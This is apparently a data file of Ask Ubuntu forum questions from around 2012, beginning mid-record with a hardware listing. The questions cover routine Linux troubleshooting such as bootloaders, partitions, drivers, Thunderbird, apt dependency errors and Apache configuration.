sse2 ss ht tm pbe syscall nx constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl tm2 ssse3 cx16 xtpr pdcm movbe lahf_lm configuration : cores=2 enabledcores=2 threads=4 *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 48kib capacity : 48kib capabilities : internal write-back data *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 1mib capacity : 1mib capabilities : internal write-back unified *-memory description : system memory physical id : c slot : system board or motherboard size : 2gib *-bank:0 description : sodimm ddr2 synchronous 800 mhz ( 1.2 ns ) product : modulepartnumber00 vendor : manufacturer00 physical id : 0 serial : sernum00 slot : dimm0 size : 2gib width : 64 bits clock : 800mhz ( 1.2ns ) *-bank:1 description : dimm [ empty ] product : modulepartnumber01 vendor : manufacturer01 physical id : 1 serial : sernum01 slot : dimm1 *-pci description : host bridge product : n10 family dmi bridge vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 02 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display description : vga compatible controller product : n10 family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:41 memory : fea80000-feafffff ioport : dc00 ( size=8 ) memory : e0000000-efffffff memory : fe900000-fe9fffff *-multimedia description : audio device product : n10/ich 7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:43 memory : fea78000-fea7bfff *-pci:0 description : pci bridge product : n10/ich 7 family pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : e000 ( size=4096 ) memory : feb00000-febfffff ioport:80000000 ( size=2097152 ) *-network description : ethernet interface product : atheros communications vendor : atheros communications physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : c0 serial : xx size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.1.99 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 memory : febc0000-febfffff ioport : ec00 ( size=128 ) *-usb:0 description : usb controller product : n10/ich 7 family usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport : d880 ( size=32 ) *-usb:1 description : usb controller product : n10/ich 7 family usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:19 ioport : d800 ( size=32 ) *-usb:2 description : usb controller product : n10/ich 7 family usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport : d480 ( size=32 ) *-usb:3 description : usb controller product : n10/ich 7 family usb uhci controller # 4 vendor : intel corporation physical id : 1d.3 bus info : pci @ 0000:00:1d.3 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport : d400 ( size=32 ) *-usb:4 description : usb controller product : n10/ich 7 family usb2 ehci controller vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : fea77c00-fea77fff *-pci:1 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : e2 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-isa description : isa bridge product : nm10 family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-ide description : ide interface product : n10/ich7 family sata ide controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 version : 02 width : 32 bits clock : 66mhz capabilities : ide pm bus_master cap_list emulated configuration : driver=ata_piix latency=0 resources : irq:19 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : ff90 ( size=16 ) memory:80200000-802003ff *-disk description : ata disk product : wdc wd10tpvt-11u vendor : western digital physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 01.0 serial : wd-wxc1a80p0314 size : 931gib ( 1tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=00088c47 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : /media/private version : 1.0 serial : 042daf2d-350c-4640-a76a-4554c9d98c59 size : 300gib capacity : 300gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2011-11-06 11:05:03 filesystem=ext4 label=private lastmountpoint=/media/private modified=2012-04-13 20:01:16 mount.fstype=ext4 mount.options=rw , relatime , barrier=1 , stripe=1 , data=ordered mounted=2012-04-13 20:01:16 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 625gib capacity : 625gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : linux filesystem partition physical id : 5 logical name : /dev/sda5 logical name : /media/storage capacity : 600gib configuration : mount.fstype=ext4 mount.options=rw , relatime , barrier=1 , stripe=1 , data=ordered state=mounted *-logicalvolume:1 description : linux filesystem partition physical id : 6 logical name : /dev/sda6 logical name : /media/dropbox capacity : 24gib configuration : mount.fstype=ext4 mount.options=rw , relatime , barrier=1 , stripe=1 , data=ordered state=mounted *-volume:2 description : ext4 volume vendor : linux physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 logical name : /media/www version : 1.0 serial : 9b0a27b4-05d8-40d5-bfc7-4aeba198db7b size : 2570mib capacity : 2570mib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2011-11-06 11:05:11 filesystem=ext4 label=www lastmountpoint=/media/www modified=2012-04-15 11:31:12 mount.fstype=ext4 mount.options=rw , relatime , barrier=1 , stripe=1 , data=ordered mounted=2012-04-15 11:31:12 state=mounted *-volume:3 description : linux swap volume physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 version : 1 serial : 6ed1130e-3aad-4fa6-890b-77e729121e3b size : 4098mib capacity : 4098mib capabilities : primary nofs swap initialized configuration : filesystem=swap pagesize=4096 *-serial unclaimed description : smbus product : n10/ich 7 family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 32 bits clock : 33mhz configuration : latency=0 resources : ioport:400 ( size=32 ) *-scsi physical id : 1 bus info : usb @ 1:4 logical name : scsi2 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/sdb size : 3864mib ( 4051mb ) capabilities : partitioned partitioned : dos configuration : signature=000b4c55 *-volume description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 2:0.0.0,1 logical name : /dev/sdb1 logical name : / version : 1.0 serial : 33926e39-4685-4f63-b83c-f2a67824b69a size : 3862mib capacity : 3862mib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2011-10-11 14:03:46 filesystem=ext4 lastmountpoint=/ modified=2012-03-19 11:47:29 mount.fstype=ext4 mount.options=rw , noatime , errors=remount-ro , barrier=1 , data=ordered mounted=2012-04-15 11:31:11 state=mounted rfkill list all doesnt show anything ! dmesg | grep -i firmware [ 0.715481 ] pci 0000:00:1f.0 : [ firmware bug ] : tigerpoint lpc.bm_sts cleared
122229	cheese webcam booth stuck in fullscreen	i decided to put cheese webcam booth in fullscreen mode . how do i undo this ?
122230	how can i associate .doc files to ms word 2010 using the same .desktop file as launcher ?	i 'm trying to associate .doc and .docx files to ms word 2010 using the same .desktop file as unity dash and launcher , so i can use the word icon in launcher . i tried : [ desktop entry ] name=microsoft word 2010 exec=env wineprefix= '' /home/nastys/.mso2010 '' wine `` c : /program files/microsoft office/office14/winword.exe '' % f type=application startupnotify=true comment=create and edit professional-looking documents such as letters , papers , reports , and booklets by using microsoft word . icon=29f5_winword.0 startupwmclass=winword.exe mimetype=application/msword ; application/vnd.openxmlformats-officedocument.wordprocessingml.document ; using this .desktop file i can launch word with its icon in unity launcher , but if i associate .doc files to the same file word will launch , but it wo n't open the .doc file . if i associate .doc files to any .desktop file generated by wine it will launch word , but it will use wine icon . edit : i recreated the original file for reference : [ desktop entry ] name=microsoft word 2010 exec=env wineprefix= '' /home/nastys/.wine '' wine c : \\\\windows\\\\command\\\\start.exe /unix /home/nastys/.wine/dosdevices/c : /users/nastys/start\\ menu/programs/microsoft\\ office/microsoft\\ word 2010.lnk type=application startupnotify=true path=/home/nastys/.wine/dosdevices/c : /program files/microsoft office/office14 icon=0575_wordicon.0
122235	high power consumption and wakeups on my asus x54h	so i 've been using powertop to try and reduce the power consumption on my laptop as i only seem to get about 3 hours of battery . from reading other threads on here it seems my power consumption and wakeups are strangely high , here 's a summary : the battery reports a discharge rate of 10.2 w summary : 651.8 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec the things which stand out as odd : 1.31 w 4.0 ms/s 166.7 interrupt ps/2 touchpad / keyboard / mouse so more than 10 % of my battery is being consumed by my touchpad/keyboard ? that does n't seem right . 548 mw 34.3 ms/s 45.9 process compiz 5 % from compiz . is this correct ? 376 mw 1.8 ms/s 47.5 interrupt [ 51 ] i915 298 mw 1.4 ms/s 37.7 timer tick_sched_timer another few percent from these things- not quite sure what they are . for reference i 've installed laptop mode tools , jupiter ( on power save ) , the cpu governor is definitely on powersave and brightness is on minimum . what else can i do/any ideas ? i 've seen other posts on here reporting laptop battery lives of ~8 hours and power consumption of 4w rather than my 10w ...
122239	is it possible to use compiz cube in gnome classic ?	i was wondering if the compiz cube works in gnome classic too ? and if yes , how shall i install it ?
122242	how do i remove kubuntu-full and all it 's applications ?	i 'm running 12.04 - i installed kubuntu to try it out and realized that with all the bloatware applications that i did n't want it anymore - i was able to uninstall the kubuntu-desktop but there are still packages left over ... how can i make sure i get rid of everything kubuntu installed - even the kde leftovers ? here 's some of what 's left when i ran sudo apt-get autoremove kde then `` tab '' it displayed this : kdeaccessibility kdepim-runtime kdeadmin kde-runtime kde-baseapps kde-runtime-data kde-baseapps-bin kdesdk-dolphin-plugins kde-baseapps-data kde-style-oxygen kde-config-cron kdesudo kde-config-gtk kdeutils kde-config-touchpad kde-wallpapers kdegames-card-data kde-wallpapers-default kdegames-card-data-extra kde-window-manager kde-icons-mono kde-window-manager-common kdelibs5-data kde-workspace kdelibs5-plugins kde-workspace-bin kdelibs-bin kde-workspace-data kdemultimedia-kio-plugins kde-workspace-data-extras kdenetwork kde-workspace-kgreet-plugins kdenetwork-filesharing kde-zeroconf kdepasswd kdf kdepim-kresources kdm kdepimlibs-kio-plugins kdoctools those are all installed by kubuntu ... correct ? i just want to go back to my ubuntu 12.04lts with gnome2-classic and without all the kubuntu extras . i started it off by just removing unnecessary apps that came with kubuntu-full - then realized i didnt want the whole thing at all and uninstalled kubuntu-full but it still says i have these as well : alex @ griever : ~ $ sudo apt-get -- purge remove kubuntu- kubuntu-debug-installer kubuntu-netbook-default-settings kubuntu-default-settings kubuntu-notification-helper kubuntu-firefox-installer kubuntu-web-shortcuts
122243	is there any version of vmware player for ubuntu available ?	is there any version of vmware player for ubuntu available ? how can i install it , if there is ?
122250	does n't suspend when closing lid on a dell inspiron n5110	this is what advanced settings tell me : shell > laptop lid close action on battery > suspend shell > laptop lid close action when on ac > suspend the screen is on when i open the lid after closing for a few seconds . but not when i suspend from the session menu . still the battery on my dell inspiron n5110 is always empty when i get back to it after closing the lid . 'why ? ' is my question .
122257	thunderbird only loads `` inbox '' ? how about the other folders that already exists ?	i am wondering why thunderbird only loads my inbox and ignores the rest of the folders i have created using my internet browser ? thanks .
122260	why am i getting this error message in thunderbird ?	`` the stat command did not succeed . error getting message number and sizes . mail server pop3.live.com responded : exceeded the login limit for a 15 minute period . reduce the frequency of requests to the pop3 server . '' everything worked just fine and now i am getting this error message . why is it ? thanks
122265	why does `` extra column 1.1.4 '' screw up all my email lists in thunderbird ?	i was trying to make my extra folders appear in thunderbird using the extension `` extra column '' and all it does it messes up the original folders ( they disappear and only an empty space is visible there ) . why is this ? how can i make my extra folders appear ?
122271	( 11.10 ) install windows on logical/extended partition -- dual-boot	i have 3 primary/basic partitions : sda1 . ubuntu 11.10 root drive ( 40g ) sda2 . freebsd root ( 20g ) sda3 . windows xp root drive ( 4g ) i have a logical/extended partition sda4 of 234gb , divided into 5 disks ( sda6~9 ) . the primary partition # 3 [ sda3 ] has only 4g space , which is quite insufficient ( i need windows only for ms office , and a few odd engineering software ; so i wish to use the least possible , but efficient , space for it ) . my query is , can i install windows xp to one of the disks ( sda6~9 ) on the logical/extended partition without damaging the partition table structure and the in any of the primary & logical partitions/disks ? partitions structure : /dev/sda /dev/sda1 ext4 / oneiric-ocelot 40g` /dev/sda2 ufs freebsd 20g /dev/sda3 ntfs winxp pro 4g # this will be formatted 'ext4 ' & contents of '/mix ' will come here /dev/sda4 extended 234g /dev/sda5 ext4 /docs docs 34g /dev/sda6 ext4 /multimedia multimedia 186g /dev/sda7 unallocated 2mb /dev/sda8 ext4 /mix mix 10g # xp is to be installed here /dev/sda9 linux-swap 04g`
122272	how to make music ?	do you know how i can produce my own songs on ubuntu ( 11.04 ) . something like fruity loops oder magix music maker on windows , just for ubuntu ?
122275	ubuntu 12.04 does not start gui	i have just upgraded my installation of ubuntu 12.04 beta , and now i wo n't start the gui . if i go into `` previous versions of linux '' from the boot-menu i can start the old upgrade without problems . the one that does n't works runs kernel 3.2.0-23-generic . the one that works is running 3.2.0-22-generic . what i 'm asking is how to either fix the upgraded version , or make it disappear ( at least from the listing ) so i do n't how to mess around in grub when i boot my computer . thanks .
122280	making gnome-shell default	any way to make gnome-shell as default window manager other than adding gnome-shell -- replace ' with in the startup application
122283	why is this text red when i check to see if a usb device is connected ?	i am trying to get my galaxy tab 10.1 to connect to my ubuntu 11.04 computer . it 's not working , and i 've asked about it on the android se site . however , it seems there might be issues on the ubuntu side , so i 'm asking about that here . when i run this ls /dev command , it gives me a response indicating that the device is detected : $ ls /dev | grep gtab gtab but the text is red , which makes me think something is wrong . it looks like this : is this red text indicitive of a problem , and is it fixable ?
122288	access samba by host name	i have set up samba on ubuntu server . everything works fine , but i can access the dir only by providing ip address : smb : //192.168.1.2/public but not the host name smb : //myhost/public . user @ host $ : cat /etc/hostname myhost.org what do i need to set up to see this from other machines without providing ip ?
122296	undo zcat to internal hdd and recover the data	i wanted to made a usb ubuntu installer via zcat , because the t61s of my dad do n't have a cd drive . so i used `` sudo zcat boot.img.gz > /dev/sdb '' but i forgot to change the sdb to sdc and overwrite my mediastorrage . is there any possibility to undo that ? thanks so far .
122301	ubuntu wo n't boot in dual boot even after reinstall	i had dual boot ubuntu 11.10 and win 7 . my boot loader used to be windows wubi , yet after lousy partitioning error by me , my ubuntu crashed and would n't start at startup and says somthing about wubildr.mbr file missing . i just installed the new 12.04 from live usb . formatted the ubuntu drive and converted it to ext4 and was hoping that the grub takes over but nothing happened . still the same error . the install recognizes the 12.04 installation but i ca n't boot it . still the windows boot loader error screen . what should i do now ?
122303	how to move the dash launcher home button to the panel ?	is it possible to use the natty bfb ( ubuntu button that opens the dash ) in precise ? i really liked the design of having the button on the menu as opposed to having it on the launcher .
122304	`` shutdown '' or `` restart '' logs out	while logged in as a sudo user , click the right top power icon , then select and click `` shutdown '' menu , it comes up with a dialog asking if i want to close all programs . the dialog has two options : restart or shutdown . choose either one logs me out . syslog has the following line about restart : warning : unable to restart system : authorization is required this happened after i installed ntp and some openstack packages while working in a prototype project . my ubuntu 's software is up to date as of this writing . anyone encountered the same problem in 12.04 ?
122306	flash does not work with the latest updates	flash does not work in any browser . xubuntu 11.10 . i 've looked everywhere , i 've tried flash-aid , i 've placed the flash file manually , nothing works . midori , chromium , iceweasel , firefox , w/e . reinstalled many times , rebooted countless ones , i 've been trying for three days now . what am i supposed to do ? i am lost . flash is essential for me . soon to reach the breaking point and switch . running : dpkg -l | grep -i flash ii adobe-flash-properties-gtk 11.2.202.228-0oneiric1 gtk+ control panel for adobe flash player plugin version 11 ii adobe-flashplugin 11.2.202.228-0oneiric1 adobe flash player plugin version 11 rc flashplugin-installer 11.2.202.228ubuntu0.11.10.1 adobe flash player plugin installer
122307	need to try several times to log into ubuntu normally	my ubuntu 11.10 works perfectly until recently . in the past few days , it happens quite often that after i input my password to the login screen , ubuntu shows only brown screen and gets stuck . no menus , no desktop icons , only a blank brown background , and pointer is movable . i have to press ctrl+alt+del to reboot it . then during booting , ubuntu will check disk errors , then shows the login screen , and this time i can log into ubuntu normally . sometimes , i might even need to reboot several times . and this problem actually occurs long before , but only very occasionally at that time . some other information that might be relevant : i suspect that this problem is caused by some problems in my disk . there are 10 bad sectors in my disk according to smart data . and i see disk error checking during booting from time to time . when this problems happens ( after login , ubuntu gets stuck and shows no desktop icons ) , i press ctrl+alt+f1 and log into the computer , i can not modifies anything in the computer . the disk is in readonly mode . say i can not save some edited text file , the shell shows the disk is read only . in disk utility 's smart data , the self tests is failed ( read ) . i notice this after i did a fsck and then clicked on self test in disk utility . but i am not sure whether this is caused by doing fsck . since before doing fsck , i did n't look at self tests . i am using ext4 partion for ubuntu , and it mounts three other ntfs partions . will the ntfs partion 's error cause this problem ( if there are errors in ntfs partitions ) ? or only the errors in ext4 partion would cause this problem ? thanks .
122326	large tmpfs /run partition - must it be so big ?	i am running ubuntu 11.10 desktop on a couple of 8g ram wintel boxes . both have been created automatically by the default installer with a 1.6gb tmpfs /run partition , where i suspect this amount of ram could be more usefully used elsewhere in the system . i suspect that the installer takes 20 % as the default , which is probably ok for boxes with lots less ram , but seems overkill for an 8gb system . my question is - can i change its size , if so , how , and what are the risks in doing so ? the /run partition does not appear in the /etc/fstab file so it must be set up elsewhere .
122327	how to replace grub with burg without overwriting mbr ?	i 'd like to install burg but i do n't want it to overwrite my mbr . that 's because i 've got two bootloaders in my system : default windows 7 in mbr grub in /dev/sda2 with the first power button , it will boot into windows and with the second button it boots from /dev/sda2 , loading grub and then kubuntu . now i want to replace grub with burg . i 've installed burg with burg-install /dev/sda2 -- force because i do n't want my mbr to be overwritten ( pressing the first power button must load windows and avoid showing any sign of linux ) . setup was completed without errors , if i open burg-manager it loads my settings , allowing me to change them and to test everything with burg-emu , so i 've changed my settings but the second power button still loads grub ( even a different version from the default kubuntu one ) . how can i replace grub that 's on /dev/sda2 with burg and without overwriting mbr ?
122328	can thunderbird handle all existing folders on hotmail account ?	i was wondering : is it true that thunderbird can not show folders on hotmail account that were created using your internet browser ?
122329	disable kubuntu mouse autoclick	i 've got an annoying problem with kubuntu . when i stop moving my mouse ( using a trackpad ) , it autoclicks . i 've found a soultion for ubuntu , but i ca n't find it in kubuntu 11.10 , so i 'd like to know if there 's a way to stop mouse autoclick after movement . thanks : )
122330	unable to restart apache , getting error : apache2 : bad user name $ { apache_run_user }	i am getting this error trying to restart apache , does anyone know how to fix this ? thanks ,
122335	windows randomly stop accepting input from bluetooth keyboard	i 've got a laptop running ubuntu 11.10 with the most recent updates and an apple wireless keyboard that syncs via bluetooth . the ubuntu box is also a synergy server , using quicksynergy to run synergy . i 'm using xmodmap to swap the option and command keys , but nothing else . throughout the day , windows that are long running will just stop accepting input . for example , i leave gnome-terminal up and running almost 24 hours a day . if it sits for a while , it just stops accepting input . it does n't matter if i 'm ssh 'd into another machine or sitting on a local tty session , it just stops accepting input . if i open a new tab or window , those work fine . the 'broken ' tabs stay broken . i 'm also running turpial ( a twitter client ) which will do that same thing . i tend to use the arrow keys to navigate , and it just stops accepting input . closing it and reopening it causes it to work fine . i do n't seem to have the problem in chrome , but i tend to open up new tabs when i go somewhere instead of using existing tabs . i 've updated all the packages , rebooted , and the only thing that seems to cure it is if i type on the built-in keyboard , the window will start to accept text from the bluetooth keyboard ( until it stops again ) . i do n't think the keyboard is disassociating from the laptop because it can happen while i 'm using the keyboard , it seems more linked with windows that i sit for a long time . as an example , i 'm typing in chrome with the bluetooth keyboard but i have a terminal window that wo n't accept input .
122336	problem in loading certain websites in ubuntu 11.10	i have a dsl connection in ubuntu 11.04 and am having problems loading content from certain websites ( such as heroku.com , ubuntuforums.org ) mostly providing cdn services , though google and gmail run perfectly . i have tried every suggestion asked at problem loading internet pages as i have the same problem . also tried to remove the dns cache and browser cache . i have tried using google dns server : 8.8.8.8 and 8.8.4.4 , but nothing seems to work . though when i browse the websites in windows xp then it does not pose any problem . this problem has come up only few days ago and has affected every browser ( chrome , firefox and opera ) in ubuntu 11.04 . thanks in advance .
122337	broken package manager due to incorrect banshee package	sup , so , i 'm not familiar with linux at all so help is much appreciated . i 've been trying to boot my pc up from a live cd unsuccessfully . i get to the stage at which there are the options to test without installing or install or so on where i select 'install ubuntu . ' here it relays through some fast dos commands until it reaches 'end trace ' and then , eventually , 'killed . ' i have already got a functional 11.10 version installed , could this be a problem ? the reason i am attempting a reinstall is because the package system is damaged inside 11.10 , a problem i ca n't seem to solve . if i try to install any new software from within the software centre it tells me that two banshee extensions must be removed . i try to remove these from inside the terminal , using apt-get remove , which results in : ** you might want to run apt-get -f install to correct these : the following packages have unmet dependencies . banshee-extension-ubuntuonemusicstore : depends : banshee ( > = 2.2.1 ) but 2.2.0-1ubuntu2 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . the software centre suggests that i disable all third party repositories and run apt-get install -f i have done so but the package system remains damaged and apt-get install -fattempts to install banshee 2.2.1 but returns : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : banshee suggested packages : banshee-dbg the following packages will be upgraded : banshee 1 upgraded , 0 newly installed , 0 to remove and 23 not upgraded . 2 not fully installed or removed . need to get 0 b/2,082 kb of archives . after this operation , 20.5 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 158653 files and directories currently installed . ) preparing to replace banshee 2.2.0-1ubuntu2 ( using ... /banshee_2.2.1-1ubuntu3_i386.deb ) ... unpacking replacement banshee ... dpkg : error processing /var/cache/apt/archives/banshee_2.2.1-1ubuntu3_i386.deb ( -- unpack ) : corrupted filesystem tarfile - corrupted package archive dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/banshee_2.2.1-1ubuntu3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have also tried apt-get update ( runs fine ) and apt-get upgrade . the upgrade command apt-get upgrade results in : reading package lists ... done building dependency tree reading state information ... done you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . banshee-extension-soundmenu : depends : banshee ( > = 2.2.1 ) but 2.2.0-1ubuntu2 is installed banshee-extension-ubuntuonemusicstore : depends : banshee ( > = 2.2.1 ) but 2.2.0-1ubuntu2 is installed e : unmet dependencies . try using -f. i seem to be going round and round in circles here ! if only i could reinstall successfully . only proposed updates ( oneiric proposed ) is not enabled .
122338	split a partition with gparted	these are my current disk partitions . /yedek is for some personal backup files . as you can see there is only ubuntu on my pc . i will install windows , too . because of this i want to shrink /dev/sda3 . it currently 546gb and i want to split it : 300gb for / and 246gb for windows ( ntfs ) is ok for me . i 'm using gparted for the first time . how can i shrink / ? i do n't want to lose any datas from ubuntu .
122339	how to enable unity 3d support in 12.04 using open-source drivers for radeonhd cards ?	as the title says i ca n't enable the unity 3d support when i 'm using open-source drivers ( xorg-edgers ) . i have an xfx radeon hd 6950 by the way . if i install the proprietary 12.3 drivers from amd it works , but i get poorer 2d performance than the open-source drivers and also i get some freezes and lock ups at random . so because of this i 'm trying the open-source drivers and so far no issues at all , except this one . running this command $ /usr/lib/nux/unity_support_test -p shows this : opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.2 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no and this command $ lspci -nn | grep vga shows : 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati cayman pro [ radeon hd 6950 ] [ 1002:6719 ] so , is this normal ? do i need to go back to proprietary drivers to enable unity 3d ? if anyone can give me help , i 'll much appreciate it .
122341	volume setting is n't remembered after restart/shutdown	this is my first time here and i 'm new to linux and also to ubuntu . i 've installed first version 11.10 and there was some problems with the unity dock and also the problem with the volume not being remembered after restart or shutdown . i 'm using dualboot with windows 7 . ubuntu was installed after windows . i have 2 sound cards . one is onboard , on the motherboard , and the other is external , an e-mu 0404 usb 2.0 sound card . the last one is my primary sound card and i 've choosed it as default output sound card . i 've upgraded to 12.04 hopeing that this was fiex but even in this version the os does n't keep the volume where it was last time . the big problem is that sometimes i forget about this problem and start music and it starts at full volume and soon i think i will die of heart attack . is there a way to make it remember or at least to tell him to start at a specific volume not at 100 % ?
122343	install windows 7 from ubuntu on usb drive	i do n't have cd burner , so i want to install w7 on my 2nd computer via an usb-drive . i just copied the files from the iso but it wo n't boot . so i installed ms-sys and did a ms-sys -7 /dev/sdb but it just says `` boot error '' . how can i install it the right way ? tried many different tutorials by now but none worked .
122345	rhythmbox is missing last.fm like button	so , rhythmbox used to have buttons for `` loving song '' and `` banning song '' for the last.fm stream . this is important , because clicking the love song button make the song appear more on the stream . in precise , i could n't find it . was it removed or is it just missing ?
122346	will mono be carried forward by upgrading to 12.04 ?	i plan to upgrade from 11.10 to 12.04 when 12.04 is released . i noticed from my previous experience in upgrading from 11.04 to 11.10 , that synaptic , which was dropped in 11.10 , was retained on my system presumably because i upgraded from 11.04 ( which did have synaptic by default ) and did n't do a new install . given that synaptic was retained , my question relates to mono . if i do n't remove mono , will it be carried forward when i upgrade to 12.04 just like synaptic was ? edit : updated information on programs that need mono and how to remove it are here : how to remove mono ? .
122351	set 48000 hz by microphone	on windows i can set the input hz to 48000 . with 41000 hz my microphon makes annoying sounds . with 48000 hz this is solved in windows . so how can i set the frequency in ubuntu globally for all application , especially skype ?
122353	virtual box doesnt have files machine and help tab	this is the second time im asking this question because someone had to close my question for a reason which i still dont understand . this is the original question why is my files , machine , help tab missing in ubuntu 11.10 ? most importantly , i can not access the machine menu that should be there but isnt . i am using ubuntu 11.10 with oracle virtualbox 4.1.10 the reason why i am asking , is because i would like to run a usb key inside my virtual box , but since i can not access machine , i ca n't access the devices manager either . just for your information , ive already installed the guest additions .
122354	`` aticonfig : no supported adapters detected '' error when installing ati radeon hd 5650 drivers [ ubuntu 11.10 ]	i have a laptop dell inspiron 14r n4010 with ati radeon hd 5650 . i tried to install the right driver ( from version 11.11 to 12.2 ) but when i get to the part of generating a newer version of the xorg config file it shows this message : `` aticonfig : no supported adapters detected '' how can i solve this ? edit : i follow all instructions i found here : ati incompatible with gnome-shell ?
122357	brightness setting not remembered on an asus x54h	so i set the screen brightness using either the function keys or the brightness & lock app . after a reboot or plugging in a/c the brightness goes back to max . when i take a/c off brightness is again reset to maximum . i 'd just like ubuntu to remember what brightness setting i like ! any ideas ? laptop is an asus x54h
122358	run /etc/cron.daily/apt at a specific time ( i.e . without anacron )	i want to setup a cron job to download up-to-date package only at night . but i found that the cron.daily jobs will be run by anacron if it 's installed , so if my computer fails to wake-up at night to do the job , it will run the next time i turn it on . how configure my system to run /etc/cron.daily/apt exclusively with cron ( i.e . at and only at the specified time ) ? this is my /etc/crontab # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly )
122360	is there a modern tutorial for setting up ssl on apache2 ?	i 've been running apache2 for ages on my ubuntu server without ssl . now that i want to have some directories delivered by ssl , i ca n't find any straightforward tutorials that were written recently . the best i 've found is http : //vanemery.com/linux/apache/apache-ssl.html but it tells me to put stuff in /etc/httpd/conf i do n't want to guess that that should translate to /etc/apache2/conf because guessing based on old tutorials has ruined my web serving before .
122362	brightness level is not remembered on hp probook 6560 ( sandybridge )	brightness level is not remembered on hp probook 6560 ( sandybridge ) with ubuntu 12.04 beta2 . removing .pulse folder in home directory does n't help . i read some news about this problem and it seems to be common ubuntu problem or bug not only on related to hp probook . any suggestions how to fix it ?
